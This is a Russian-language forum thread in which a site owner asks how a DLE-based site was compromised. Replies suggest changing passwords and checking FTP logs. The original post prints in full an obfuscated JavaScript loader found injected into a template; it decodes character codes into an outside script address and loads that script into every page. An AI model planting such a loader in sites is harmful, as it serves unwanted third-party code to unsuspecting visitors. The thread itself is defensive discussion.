Странный взлом, интересует ваше мнение

[Удален]
578

Сегодня заметил на своем ДЛЕшном сайте попандер, который, естественно, я не устанавливал.

Нашел вот такой код в main.tpl

<!--

function zX750(qn584){document.write( String.fromCharCode(parseInt(qn584)-1));}

var QF351="105m117m117m113m59m48m48m83m106m76m112m51m"+

"53m47m112m108m112m116m105m102m100m105m108m98m47m111m"+

"102m117m48m116m48m113m106m90m113m68m55m50m51m55m48m"+

"64m116m106m101m62m56m57m51m55m55";var NA61=QF351.split("m");

document.write("<s"+"cript type='text/javascript' language='javascri"+"pt' src='");

for(S494=0;S494<NA61.length;S494++){zX750(NA61[S494]);}

document.write("'></sc"+"ript>");

// -->

Убрал код, проверил на вирусы. Все чисто.

Но - в папке templates все tpl файлы были изменены.

Изменений внешнего вида, вывода новостей и т.д. я не заметил.

Как по вашему был осуществлен взлом? Где слабое место? На что еще следует обратить внимание?

Заранее спасибо!

AM
На сайте с 09.01.2007
Offline
467
#1

ДЛЕ то хоть лицензия? обновления ставили?

[Удален]
#2

Нет - двиг нуленый, заплатку на 8.2 от известной проблемы ставил

ixRock
На сайте с 14.11.2006
Offline
46
#3

Вася, это вирус!!! Удаляйте скорее свой сайт пока весь интернет не позаразили!!!11один

Работаю [S]за еду и секас[/S] с XHTML, CSS, XSLT, JS, PHP. Если что, вот тут (http://www.mintdesign.ru/) некоторые мои работы. Контакты: ася 344-ноль86-276, мыло ixrock@gmail.com
SM
На сайте с 27.07.2008
Offline
139
#4

Смените пароль от ftp, админ-панели. Не сохраняйте пароли в различных ftp-менеджерах.

UV Journal — платная премиум тема для WordPress (/ru/forum/994137)
[Удален]
#5
ixRock:
Вася, это вирус!!! Удаляйте скорее свой сайт пока весь интернет не позаразили!!!11один

Проверили все - вируса нет! Пароли изменили. Что еще необходимо сделать?

S
На сайте с 12.11.2009
Offline
13
#6

определить способ первоначального взлома

- логи (ФТП, найти ИП, который вызывает подозрение)

- саппорт хостинга (если логов сами найти не можете)

ээ, если с заходами на ФТП всё айс, проблема скорее-всего в конкретной версии движка

[Удален]
#7

спасибо большое всем за советы!

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий